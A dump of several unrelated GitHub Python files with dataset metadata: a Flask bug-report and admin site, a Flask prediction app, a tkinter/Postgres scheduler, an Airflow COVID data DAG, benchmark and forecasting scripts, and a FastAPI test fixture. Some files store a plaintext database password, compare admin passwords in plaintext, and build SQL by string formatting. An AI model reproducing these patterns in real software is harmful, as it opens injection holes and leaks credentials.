form=form)\n\n@app.route('/bugs', methods=['GET','POST'])\ndef bugReporting():\n\tform = ContactForm()\n\n\tif request.method == 'POST':\n\t\tform.name = request.form['name']\n\t\tform.email = request.form['email']\n\t\tform.message = request.form['message']\n\n\t\tif form.name != \"\" and form.email!= \"\" and form.message != \"\":\n\t\t\tmsg = Message(\"Bug Report\", sender='NoReply_BBP_Bugs@gmail.com', recipients=['boomboompass.game@gmail.com'])\n\t\t\tmsg.body = \"\"\"\n\t\t\tFrom: %s <%s>\n\t\t\tMessage: %s\n\t\t\t\"\"\" % (form.name, form.email, form.message)\n\t\t\tmail.send(msg)\n\t\t\tprint(\"message sent\")\n\n\t\t\treturn render_template('bugReport.html',done=True)\n\t\n\treturn render_template('bugReport.html')\n\n@app.route('/admin',methods=['GET','POST'])\ndef adminSignin():\n\tif 'idAdmin' in login_session:\n\t\tadmin = session.query(Admin).filter_by(id=login_session['idAdmin']).one()\n\t\treturn redirect(url_for('admin'))\n\n\tif request.method == 'POST':\n\t\tusername = request.form[\"username\"]\n\t\tpassword = request.form[\"password\"]\n\t\t\n\t\tadminCheck=session.query(Admin).filter_by(username=username).first()\n\n\t\tif(adminCheck != None and adminCheck.password==password):\n\t\t\t# Logged in successfully\n\t\t\tlogin_session['idAdmin'] = adminCheck.id\n\t\t\treturn redirect(url_for('admin'))\n\t\telse:\n\t\t\treturn redirect(url_for('adminSignin'))\n\telse:\n\t\treturn render_template('adminSignin.html')\n\n@app.route('/admin-panel-secret-login', methods=['GET','POST'])\ndef admin():\n\tif 'idAdmin' in login_session:\n\t\temails = session.query(Emails).all()\n\n\t\treturn render_template('admin.html' , emails=emails)\n\telse:\n\t\treturn redirect(url_for('adminSignin'))\n\n@app.route('/deleteEmail/', methods=['GET','POST'])\ndef deleteEmail(id):\n\tif 'idAdmin' in login_session:\n\t\temail = session.query(Emails).filter_by(id=id).first()\n\n\t\tsession.delete(email)\n\t\tsession.commit()\n\n\treturn redirect(url_for('admin'))\t\n\n@app.route('/copyEmails',methods=['GET','POST'])\ndef copyEmails():\n\tif 'idAdmin' in login_session:\n\t\temails = session.query(Emails).all()\n\n\t\temailsList=[]\n\t\tfor email in emails:\n\t\t\temailsList.append(str(email.email))\n\n\t\temailsToCopy = \",\".join(emailsList)\n\n\t\tpyperclip.copy(emailsToCopy)\n\n\t\treturn redirect(url_for('admin'))\n\telse:\n\t\treturn redirect(url_for('adminSignin'))\n\n@app.route('/logout', methods=['GET','POST'])\ndef logout():\n\tif 'idAdmin' in login_session:\n\t\tdel login_session['idAdmin']\n\treturn redirect(url_for('adminSignin'))\n\n\nif __name__ == '__main__':\n\tapp.run(debug=True)\n", "repo_name": "Loai17/Boom-Boom-Pass-Website", "sub_path": "webapp.py", "file_name": "webapp.py", "file_ext": "py", "file_size_in_byte": 4861, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "41", "api": [{"api_name": "flask_mail.Mail", "line_number": 21, "usage_type": "call"}, {"api_name": "forms.ContactForm", "line_number": 81, "usage_type": "call"}, {"api_name": "forms.ContactForm", "line_number": 108, "usage_type": "call"}, {"api_name": "flask_mail.Message", "line_number": 116, "usage_type": "call"}, {"api_name": "flask.session", "line_number": 130, "usage_type": "name"}, {"api_name": "flask.session", "line_number": 131, "usage_type": "name"}, {"api_name": "flask.session", "line_number": 142, "usage_type": "name"}, {"api_name": "flask.session", "line_number": 151, "usage_type": "name"}, {"api_name": "flask.session", "line_number": 160, "usage_type": "name"}, {"api_name": "flask.session", "line_number": 170, "usage_type": "name"}, {"api_name": "pyperclip.copy", "line_number": 179, "usage_type": "call"}, {"api_name": "flask.session", "line_number": 187, "usage_type": "name"}, {"api_name": "flask.session", "line_number": 188, "usage_type": "name"}]} +{"seq_id": "73685979323", "text": "# app.py\n\nfrom Prediction_model import RegularizedLinearRegression\nimport numpy as np\n\nfrom flask import Flask, request, render_template\n\napp = Flask(__name__)\n\ndef load_model():\n # Assuming 'model' is an instance of your trained model\n loaded_model = RegularizedLinearRegression()\n loaded_model.load_model(\"trained_model.npz\")\n\n\n return loaded_model\n\n# Gradient background color\nbackground_color = \"linear-gradient(to right, #ff8a00, #da1b60)\"\n\n# Your encoding function using Label Encoder\ndef encode_input(month, date, day, year, day_encoding, month_encoding):\n \n encoded_month = month_encoding[month] \n encoded_day = day_encoding[day]\n \n encoded_input = np.array([encoded_month, \n int(date), \n encoded_day,\n int(year)])\n \n #print(\"Encoded_shape: \", encoded_input.shape)\n\n return encoded_input.reshape(1, -1)\n\n\n@app.route('/')\ndef home():\n return render_template('index.html', background_color=background_color)\n\n# +\n@app.route('/predict', methods=['POST'])\ndef predict():\n if request.method == 'POST':\n # Load the model and encoders\n loaded_model = load_model()\n\n # Get input values from the form\n month = request.form['month']\n date = request.form['date']\n day = request.form['day']\n year = request.form['year']\n \n day_encoding = {'Friday': 0, 'Monday': 1, 'Saturday': 2, 'Sunday': 3, 'Thursday': 4, 'Tuesday': 5, 'Wednesday': 6}\n month_encoding = {'April': 0, 'August': 1, 'December': 2, 'February': 3, 'January': 4, 'July': 5, 'June': 6, 'March': 7, 'May': 8, 'November': 9, 'October': 10, 'September': 11}\n\n \n # Validate inputs\n is_valid = True\n\n if day not in day_encoding:\n is_valid = False\n \n if month not in month_encoding:\n is_valid = False\n \n if date.isdigit() and 1 <= int(date) <= 31:\n date = int(date)\n \n else:\n is_valid = False\n \n \n if not is_valid:\n # Show error message\n error_msg = \"Invalid input, please try again\"\n return render_template('index.html', error=error_msg, background_color=background_color)\n\n # Encode and predict if valid\n encoded_input = encode_input(month, date, day, year, day_encoding, month_encoding)\n prediction = loaded_model.predict(encoded_input)\n\n return render_template('result.html', prediction=prediction[0], background_color=background_color)\n\n \n \n# -\n\n # Encode the input\n #encoded_input = encode_input(month, date, day, year)\n\n # Make prediction\n #prediction = loaded_model.predict(encoded_input)\n\n #return render_template('result.html', prediction=prediction[0], background_color=background_color)\n\n\nif __name__ == '__main__':\n app.run(debug=True)\n", "repo_name": "prachi-01998/Fetch", "sub_path": "app.py", "file_name": "app.py", "file_ext": "py", "file_size_in_byte": 2939, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "41", "api": [{"api_name": "flask.Flask", "line_number": 8, "usage_type": "call"}, {"api_name": "Prediction_model.RegularizedLinearRegression", "line_number": 12, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 27, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 39, "usage_type": "call"}, {"api_name": "flask.request.method", "line_number": 44, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 44, "usage_type": "name"}, {"api_name": "flask.request.form", "line_number": 49, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 49, "usage_type": "name"}, {"api_name": "flask.request.form", "line_number": 50, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 50, "usage_type": "name"}, {"api_name": "flask.request.form", "line_number": 51, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 51, "usage_type": "name"}, {"api_name": "flask.request.form", "line_number": 52, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 52, "usage_type": "name"}, {"api_name": "flask.render_template", "line_number": 77, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 83, "usage_type": "call"}]} +{"seq_id": "18980027638", "text": "import psycopg2 as pg2\nimport tkinter as tk\nfrom tkinter import ttk\nfrom tkcalendar import Calendar, DateEntry\n\ndef insert_availability(**kwargs):\n conn = None\n try:\n conn = pg2.connect(database='Work schedule', user='postgres', password='Damdamdam123!')\n cur = conn.cursor()\n\n start_date = kwargs.get('start_date', None)\n end_date = kwargs.get('end_date', None)\n start_work = kwargs.get('start_work', None)\n end_of_work = kwargs.get('end_of_work', None)\n day = kwargs.get('dat', None)\n if start_date == None:\n start_date = kwargs.get('start_date', 'null')\n else:\n start_date = f\"'{start_date}'\"\n\n if end_date == None:\n end_date = kwargs.get('end_date', 'null')\n else:\n end_date = f\"'{end_date}'\"\n\n if start_work == None:\n start_work = kwargs.get('start_work', 'null')\n else:\n start_work = f\"'{start_work}'\"\n\n if end_of_work == None:\n end_of_work = kwargs.get('end_of_work', 'null')\n else:\n end_of_work = f\"'{end_of_work}'\"\n\n if day == None:\n day = kwargs.get('day', 'null')\n else:\n day = f\"'{day}'\"\n\n cur.execute(\n f\"INSERT INTO availability(date_1,date_2,start_work,end_work,day_of_the_week)\"\n f\"VALUES({start_date},{end_date},{start_work},{end_of_work},'{day}')\")\n conn.commit()\n\n cur.execute(\"SELECT * FROM availability\")\n rows = cur.fetchall()\n\n for row in rows:\n print(f\"ID: {row[0]}\")\n print(f\"Data początkowa: {row[1]}\")\n print(f\"Data końcowa: {row[2]}\")\n\n except(Exception, pg2.DatabaseError) as error:\n print(error)\n finally:\n if conn is not None:\n conn.close()\n\n\ndef date_from():\n def print_sel():\n print(cal.selection_get())\n\n top = tk.Toplevel(root)\n\n cal = Calendar(top,\n font=\"Arial 14\", selectmode='day',\n cursor=\"hand1\", year=2018, month=2, day=5)\n cal.pack(fill=\"both\", expand=True)\n ttk.Button(top, text=\"ok\", command=print_sel).pack()\n\n\ndef date_to():\n def print_sel():\n print(cal.get_date())\n top = tk.Toplevel(root)\n\n ttk.Label(top, text='Choose date').pack(padx=10, pady=10)\n cal = DateEntry(top, width=12, background='darkblue',\n foreground='white', borderwidth=2)\n cal.pack(padx=10, pady=10)\n ttk.Button(top, text=\"ok\", command=print_sel).pack()\n\nroot = tk.Tk()\ns = ttk.Style(root)\ns.theme_use('clam')\n\nttk.Button(root, text='Date from', command=date_from).grid(column=0, row=0)\nttk.Button(root, text='Date to', command=date_to).grid(column=0, row=1)\n\nroot.mainloop()\n\n\n\n\n# insert_availability(start_date='2022-02-01',\n# end_date=\"2022-03-01\",\n# start_work='08:00',\n# end_of_work='10:00',\n# day='Monday')\n\n", "repo_name": "dmidam/working_schedule", "sub_path": "main.py", "file_name": "main.py", "file_ext": "py", "file_size_in_byte": 2971, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "41", "api": [{"api_name": "psycopg2.connect", "line_number": 9, "usage_type": "call"}, {"api_name": "psycopg2.DatabaseError", "line_number": 55, "usage_type": "attribute"}, {"api_name": "tkinter.Toplevel", "line_number": 66, "usage_type": "call"}, {"api_name": "tkcalendar.Calendar", "line_number": 68, "usage_type": "call"}, {"api_name": "tkinter.ttk.Button", "line_number": 72, "usage_type": "call"}, {"api_name": "tkinter.ttk", "line_number": 72, "usage_type": "name"}, {"api_name": "tkinter.Toplevel", "line_number": 78, "usage_type": "call"}, {"api_name": "tkinter.ttk.Label", "line_number": 80, "usage_type": "call"}, {"api_name": "tkinter.ttk", "line_number": 80, "usage_type": "name"}, {"api_name": "tkcalendar.DateEntry", "line_number": 81, "usage_type": "call"}, {"api_name": "tkinter.ttk.Button", "line_number": 84, "usage_type": "call"}, {"api_name": "tkinter.ttk", "line_number": 84, "usage_type": "name"}, {"api_name": "tkinter.Tk", "line_number": 86, "usage_type": "call"}, {"api_name": "tkinter.ttk.Style", "line_number": 87, "usage_type": "call"}, {"api_name": "tkinter.ttk", "line_number": 87, "usage_type": "name"}, {"api_name": "tkinter.ttk.Button", "line_number": 90, "usage_type": "call"}, {"api_name": "tkinter.ttk", "line_number": 90, "usage_type": "name"}, {"api_name": "tkinter.ttk.Button", "line_number": 91, "usage_type": "call"}, {"api_name": "tkinter.ttk", "line_number": 91, "usage_type": "name"}]} +{"seq_id": "74886432124", "text": "import logging\nimport subprocess\nimport os\nimport time\n\nimport matplotlib.pyplot as plt\n\nJAVA_BIN = 'C:\\Program Files\\Java\\jdk1.8.0_102'\nJAVAC = os.path.join(JAVA_BIN, 'bin', 'javac.exe')\nJAVA = os.path.join(JAVA_BIN, 'bin', 'java.exe')\n\nlogging.getLogger().setLevel(logging.INFO)\n\ndef extract_return_stats(output):\n stat_list = [int(s) for s in output.split(' ') if s.isdigit()]\n return stat_list[0], stat_list[1]\n\n\ndef plot_results(*arg):\n logging.info('Plotting Results...')\n\n legend = []\n for list in arg:\n legend.append(list[0][2])\n x = []\n y = []\n for result in list:\n x.append(result[0])\n y.append(result[1])\n\n plt.plot(x, y, linewidth=2)\n\n plt.xlabel('Matrix Size')\n plt.ylabel('Time (ms)')\n plt.legend(legend, loc='upper left')\n plt.show()\n\n\nclass Benchmark(object):\n\n def __init__(self, start_size, end_size, step_size, iterations):\n logging.info('Initializing benchmark...')\n self.start_size = start_size\n self.end_size = end_size\n self.step_size = step_size\n self.iterations = iterations\n\n def run(self, java_class, thread_count):\n classpath = os.path.join('com', 'company')\n java_filename_path = os.path.join(classpath, java_class + '.java')\n java_class_path = 'com/company/{}'.format(java_class)\n\n # compile java\n subprocess.Popen([JAVAC, '-O', java_filename_path])\n\n matrix_size = self.start_size\n results = []\n while matrix_size <= self.end_size:\n cmd = [JAVA, '-cp', '.', java_class_path, str(matrix_size), str(thread_count)]\n x = 0\n time_ms = 0\n while x < self.iterations:\n p = subprocess.Popen(cmd, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE)\n stdout, stderr = p.communicate()\n time, thread_count = extract_return_stats(stdout.decode().rstrip())\n x += 1\n time_ms += time\n\n results.append([matrix_size, time_ms/self.iterations, java_class + ' ' + str(thread_count) + ' threads'])\n logging.info('[{}] average runtime for matrix size {} is {} ms'.format(java_class, matrix_size, time_ms/self.iterations))\n matrix_size += self.step_size\n\n return results\n\n# init benchmark parameters\nb = Benchmark(start_size=100, end_size=1600, step_size=100, iterations=5)\n\n# run each benchmark\nmatrix3_results = b.run('Matrix3', 4)\ntime.sleep(1)\nmatrix43b_results = b.run('Matrix43b', 8)\ntime.sleep(1)\n\n# plot all results in one graph\nplot_results(matrix3_results, matrix43b_results)\n", "repo_name": "ciarancourtney/concurrent_java_examples", "sub_path": "bench.py", "file_name": "bench.py", "file_ext": "py", "file_size_in_byte": 2663, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "41", "api": [{"api_name": "os.path.join", "line_number": 9, "usage_type": "call"}, {"api_name": "os.path", "line_number": 9, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 10, "usage_type": "call"}, {"api_name": "os.path", "line_number": 10, "usage_type": "attribute"}, {"api_name": "logging.getLogger", "line_number": 12, "usage_type": "call"}, {"api_name": "logging.INFO", "line_number": 12, "usage_type": "attribute"}, {"api_name": "logging.info", "line_number": 20, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 31, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 31, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 33, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 33, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 34, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 34, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.legend", "line_number": 35, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 35, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 36, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 36, "usage_type": "name"}, {"api_name": "logging.info", "line_number": 42, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 49, "usage_type": "call"}, {"api_name": "os.path", "line_number": 49, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 50, "usage_type": "call"}, {"api_name": "os.path", "line_number": 50, "usage_type": "attribute"}, {"api_name": "subprocess.Popen", "line_number": 54, "usage_type": "call"}, {"api_name": "subprocess.Popen", "line_number": 63, "usage_type": "call"}, {"api_name": "subprocess.PIPE", "line_number": 63, "usage_type": "attribute"}, {"api_name": "logging.info", "line_number": 70, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 80, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 82, "usage_type": "call"}]} +{"seq_id": "73525544442", "text": "import numpy as np\nfrom matplotlib import pyplot as plt\nimport itertools\nimport statsmodels.api as sm\nimport pandas as pd\nflow_file = '/media/dsl/20d6b919-92e1-4489-b2be-a092290668e4/dsl/flow_train.csv'\ndf = pd.read_csv(flow_file)\ndf['date_dt'] = pd.to_datetime(df['date_dt'].astype(str), format='%Y%m%d')\nflow_group = df.groupby(by='district_code')\n\ntarget = np.zeros(shape=(98, 274, 3),dtype=np.float32)\np = d = q = range(0, 2)\npdq = list(itertools.product(p, d, q))\nseasonal_pdq = [(x[0], x[1], x[2], 12) for x in list(itertools.product(p, d, q))]\nprint('Examples of parameter combinations for Seasonal ARIMA...')\nprint('SARIMAX: {} x {}'.format(pdq[1], seasonal_pdq[1]))\nprint('SARIMAX: {} x {}'.format(pdq[1], seasonal_pdq[2]))\nprint('SARIMAX: {} x {}'.format(pdq[2], seasonal_pdq[3]))\nprint('SARIMAX: {} x {}'.format(pdq[2], seasonal_pdq[4]))\n\n\ndef get_most():\n global mod, results\n for param in pdq:\n for param_seasonal in seasonal_pdq:\n try:\n mod = sm.tsa.statespace.SARIMAX(ds,\n order=param,\n seasonal_order=param_seasonal,\n enforce_stationarity=False,\n enforce_invertibility=False)\n results = mod.fit()\n print('ARIMA{}x{}12 - AIC:{}'.format(param, param_seasonal, results.aic))\n except:\n continue\n\n\nfor ix, x in enumerate(flow_group.count().index):\n\n d = df[df['district_code']==x]\n ds = d[['date_dt', 'flow_in' ]]\n ds = ds.set_index('date_dt')\n decomposition = sm.tsa.seasonal_decompose(ds, model='additive')\n fig = decomposition.plot()\n plt.show()\n break\n\n\n\n\nmod = sm.tsa.statespace.SARIMAX(ds,\n order=(1, 0, 1),\n seasonal_order=(1, 1, 1, 12),\n enforce_stationarity=False,\n enforce_invertibility=False)\nresults = mod.fit()\nprint(results.summary().tables[1])\nresults.plot_diagnostics(figsize=(16, 8))\nplt.show()\n\npred = results.get_prediction(start=pd.to_datetime('2017-09-15'), dynamic=False)\npred_ci = pred.conf_int()\nax = ds['2017':].plot(label='observed')\npred.predicted_mean.plot(ax=ax, label='One-step ahead Forecast', alpha=.7, figsize=(14, 7))\nax.fill_between(pred_ci.index,\n pred_ci.iloc[:, 0],\n pred_ci.iloc[:, 1], color='k', alpha=.2)\nax.set_xlabel('Date')\nax.set_ylabel('Furniture Sales')\nplt.legend()\nplt.show()\n\npred_uc = results.get_forecast(steps=2)\nprint(pred_uc)\npred_ci = pred_uc.conf_int()\nax = ds.plot(label='observed', figsize=(14, 7))\npred_uc.predicted_mean.plot(ax=ax, label='Forecast')\nax.fill_between(pred_ci.index,\n pred_ci.iloc[:, 0],\n pred_ci.iloc[:, 1], color='k', alpha=.25)\nax.set_xlabel('Date')\nax.set_ylabel('Furniture Sales')\nplt.legend()\nplt.show()", "repo_name": "dsl2009/forlove", "sub_path": "air.py", "file_name": "air.py", "file_ext": "py", "file_size_in_byte": 2983, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "41", "api": [{"api_name": "pandas.read_csv", "line_number": 7, "usage_type": "call"}, {"api_name": "pandas.to_datetime", "line_number": 8, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 11, "usage_type": "call"}, {"api_name": "numpy.float32", "line_number": 11, "usage_type": "attribute"}, {"api_name": "itertools.product", "line_number": 13, "usage_type": "call"}, {"api_name": "itertools.product", "line_number": 14, "usage_type": "call"}, {"api_name": "statsmodels.api.tsa.statespace.SARIMAX", "line_number": 27, "usage_type": "call"}, {"api_name": "statsmodels.api.tsa", "line_number": 27, "usage_type": "attribute"}, {"api_name": "statsmodels.api", "line_number": 27, "usage_type": "name"}, {"api_name": "statsmodels.api.tsa.seasonal_decompose", "line_number": 43, "usage_type": "call"}, {"api_name": "statsmodels.api.tsa", "line_number": 43, "usage_type": "attribute"}, {"api_name": "statsmodels.api", "line_number": 43, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 45, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 45, "usage_type": "name"}, {"api_name": "statsmodels.api.tsa.statespace.SARIMAX", "line_number": 51, "usage_type": "call"}, {"api_name": "statsmodels.api.tsa", "line_number": 51, "usage_type": "attribute"}, {"api_name": "statsmodels.api", "line_number": 51, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 59, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 59, "usage_type": "name"}, {"api_name": "pandas.to_datetime", "line_number": 61, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.legend", "line_number": 70, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 70, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 71, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 71, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.legend", "line_number": 83, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 83, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 84, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 84, "usage_type": "name"}]} +{"seq_id": "27157719009", "text": "import requests\nimport json\nimport pandas as pd\nimport psycopg2 as pg\nfrom datetime import date\nfrom configparser import ConfigParser\n\nconfig = ConfigParser()\nconfig.read(\"pg_creds.cfg\")\n\n#############################################################################\n# Extract / Transform\n#############################################################################\n\n\ndef fetchDataToLocal():\n \"\"\"\n Buscando dados de COVID da cidade de Nova Iorque através de uma API\n \"\"\"\n \n url = \"https://data.cityofnewyork.us/resource/rc75-m7u3.json\"\n response = requests.get(url)\n\n df = pd.DataFrame(json.loads(response.content))\n df = df.set_index(\"date_of_interest\")\n \n df.to_csv(\"data/nyccovid_{}.csv\".format(date.today().strftime(\"%Y%m%d\")))\n \n\n#############################################################################\n# Load\n#############################################################################\n\n\ndef sqlLoad():\n \"\"\"\n Conectando no banco e importando os dados para o Postgres\n \"\"\"\n #conexão com o banco de dados Postgres - Substitua pelas suas variáveis ^^\n try:\n dbconnect = pg.connect(\n database=config.get(\"postgres\", \"DATABASE\"),\n user=config.get(\"postgres\", \"USERNAME\"),\n password=config.get(\"postgres\", \"PASSWORD\"),\n host=config.get(\"postgres\", \"HOST\")\n )\n except Exception as error:\n print(error)\n \n cursor = dbconnect.cursor()\n cursor.execute(\"\"\"\n CREATE TABLE IF NOT EXISTS covid_data (\n date DATE,\n case_count INT,\n hospitalized_count INT,\n death_count INT,\n PRIMARY KEY (date)\n );\n \n TRUNCATE TABLE covid_data;\n \"\"\"\n )\n dbconnect.commit()\n \n with open(\"data/nyccovid_{}.csv\".format(date.today().strftime(\"%Y%m%d\"))) as f:\n next(f)\n for row in f:\n cursor.execute(\"\"\"\n INSERT INTO covid_data\n VALUES ('{}', '{}', '{}', '{}')\n \"\"\".format(\n row.split(\",\")[0],\n row.split(\",\")[1],\n row.split(\",\")[2],\n row.split(\",\")[3])\n )\n dbconnect.commit()\n\nfrom airflow import DAG\nfrom airflow.operators.python_operator import PythonOperator\nfrom datetime import datetime, timedelta\ndefault_args = {\n \"owner\": \"airflow\",\n \"start_date\": datetime.today() - timedelta(days=1)\n }\nwith DAG(\n \"covid_nyc_data\",\n default_args=default_args,\n schedule_interval = \"0 1 * * *\",\n) as dag:\n \n fetchDataToLocal = PythonOperator(\n task_id=\"fetch_data_to_local\",\n python_callable=fetchDataToLocal\n )\n \n sqlLoad = PythonOperator(\n task_id=\"sql_load\",\n python_callable=sqlLoad\n )\n \n fetchDataToLocal >> sqlLoad\n", "repo_name": "evandro-morini/airflow-dag-example", "sub_path": "covid_dag.py", "file_name": "covid_dag.py", "file_ext": "py", "file_size_in_byte": 2820, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "41", "api": [{"api_name": "configparser.ConfigParser", "line_number": 8, "usage_type": "call"}, {"api_name": "requests.get", "line_number": 22, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 24, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 24, "usage_type": "call"}, {"api_name": "datetime.date.today", "line_number": 27, "usage_type": "call"}, {"api_name": "datetime.date", "line_number": 27, "usage_type": "name"}, {"api_name": "psycopg2.connect", "line_number": 41, "usage_type": "call"}, {"api_name": "datetime.date.today", "line_number": 65, "usage_type": "call"}, {"api_name": "datetime.date", "line_number": 65, "usage_type": "name"}, {"api_name": "datetime.datetime.today", "line_number": 84, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 84, "usage_type": "name"}, {"api_name": "datetime.timedelta", "line_number": 84, "usage_type": "call"}, {"api_name": "airflow.DAG", "line_number": 86, "usage_type": "call"}, {"api_name": "airflow.operators.python_operator.PythonOperator", "line_number": 92, "usage_type": "call"}, {"api_name": "airflow.operators.python_operator.PythonOperator", "line_number": 97, "usage_type": "call"}]} +{"seq_id": "41631221065", "text": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sat Sep 7 15:16:27 2019\n\n@author: bhaskarnamrata\n\"\"\"\n\nfrom New_Struct import portfolio\nfrom datetime import datetime\nfrom os import path\nimport pprint\n\ndef main():\n \n p = portfolio()\n underlying = input('Underlying:')\n expiry_date = datetime.strptime(input('Expiry Date(yyyymmdd):'), '%Y%m%d').date()\n \n if path.exists('{0}_{1}'.format(underlying, expiry_date)):\n p = p.load_object(underlying, expiry_date)\n \n else:\n p.save_object(p, underlying, expiry_date)\n \n while input('Add Trades(Y/N):') == 'Y':\n current_positions = len(p.Strategy['Legs_Detail'])\n p.initialize_legs()\n new_positions = len(p.Strategy['Legs_Detail'])\n print ('{0} positions added.'.format(new_positions - current_positions))\n p.save_object(p, underlying, expiry_date)\n \n\n \n \n while input('Update Position(Y/N):') == 'Y':\n p.update_mkt_val(input('Option Type:'))\n \n \n p.save_object(p, underlying, expiry_date)\n pprint.pprint(p.Strategy['Legs_Detail'])\n\n \n \nif __name__ == \"__main__\":\n main()\n", "repo_name": "vchintaluri/VC_OP_T", "sub_path": "Trade Journal.py", "file_name": "Trade Journal.py", "file_ext": "py", "file_size_in_byte": 1152, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "41", "api": [{"api_name": "New_Struct.portfolio", "line_number": 16, "usage_type": "call"}, {"api_name": "datetime.datetime.strptime", "line_number": 18, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 18, "usage_type": "name"}, {"api_name": "os.path.exists", "line_number": 20, "usage_type": "call"}, {"api_name": "os.path", "line_number": 20, "usage_type": "name"}, {"api_name": "pprint.pprint", "line_number": 41, "usage_type": "call"}]} +{"seq_id": "35847570504", "text": "import pytest\n\nfrom fastapi import Header\nfrom fastapi.testclient import TestClient\nfrom app.main import app\nfrom app.dependencies import validate_token\nfrom firebase_admin import auth\n\nfrom tests.utility import signup_request, delete_user_request\n\nfrom os import environ\n\n\ndef override_validate_token(x_uid: str = Header()) -> dict:\n \"\"\"\n トークンをヘッダーで受け取り、検証する\n \"\"\"\n\n user = auth.get_user(x_uid)\n\n return {\n \"token\": \"fake token\",\n \"user\": {\n \"uid\": user.uid,\n \"email\": user.email,\n },\n }\n\n\n@pytest.fixture(scope=\"session\", autouse=True)\ndef test_client():\n # テスト前のセットアップ\n if \"OMNIA_ENV\" not in environ or environ[\"OMNIA_ENV\"] != \"emulator\":\n assert False, \"OMNIA_ENVが設定されていません、またはemulatorではありません\"\n if \"FIRESTORE_EMULATOR_HOST\" not in environ:\n assert False, \"FIRESTORE_EMULATOR_HOSTが設定されていません\"\n if \"FIREBASE_AUTH_EMULATOR_HOST\" not in environ:\n assert False, \"FIREBASE_AUTH_EMULATOR_HOSTが設定されていません\"\n\n # Firebase Emulatorがデータを全部消してくれるので、テスト前に消さなくてもいい\n\n test_client = TestClient(app)\n\n app.dependency_overrides[validate_token] = override_validate_token\n\n yield test_client\n\n\n@pytest.fixture(scope=\"function\")\ndef user_uid(test_client):\n response = signup_request(\n test_client,\n \"potato@potato.com\",\n \"password123\",\n )\n\n assert response.status_code == 200\n\n yield response.json()[\"uid\"]\n\n delete_user_request(test_client, response.json()[\"uid\"])\n", "repo_name": "Marley-Mulvin-Broome/tech-translator", "sub_path": "server/tests/conftest.py", "file_name": "conftest.py", "file_ext": "py", "file_size_in_byte": 1686, "program_lang": "python", "lang": "ja", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "41", "api": [{"api_name": "fastapi.Header", "line_number": 14, "usage_type": "call"}, {"api_name": "firebase_admin.auth.get_user", "line_number": 19, "usage_type": "call"}, {"api_name": "firebase_admin.auth", "line_number": 19, "usage_type": "name"}, {"api_name": "os.environ", "line_number": 33, "usage_type": "name"}, {"api_name": "os.environ", "line_number": 35, "usage_type": "name"}, {"api_name": "os.environ", "line_number": 37, "usage_type": "name"}, {"api_name": "fastapi.testclient.TestClient", "line_number": 42, "usage_type": "call"}, {"api_name": "app.main.app", "line_number": 42, "usage_type": "argument"}, {"api_name": "app.main.app.dependency_overrides", "line_number": 44, "usage_type": "attribute"}, {"api_name": "app.main.app", "line_number": 44, "usage_type": "name"}, {"api_name": "app.dependencies.validate_token", "line_number": 44, "usage_type": "name"}, {"api_name": "pytest.fixture", "line_number": 30, "usage_type": "call"}, {"api_name": "tests.utility.signup_request", "line_number": 51, "usage_type": "call"}, {"api_name": "tests.utility.delete_user_request", "line_number": 61, "usage_type": "call"}, {"api_name": "pytest.fixture", "line_number": 49, "usage_type": "call"}]} +{"seq_id": "26384906397", "text": "import logging\nimport os\nimport datetime\nimport requests\nimport xmltodict\nimport re\nfrom functools import reduce\nimport codecs\nimport 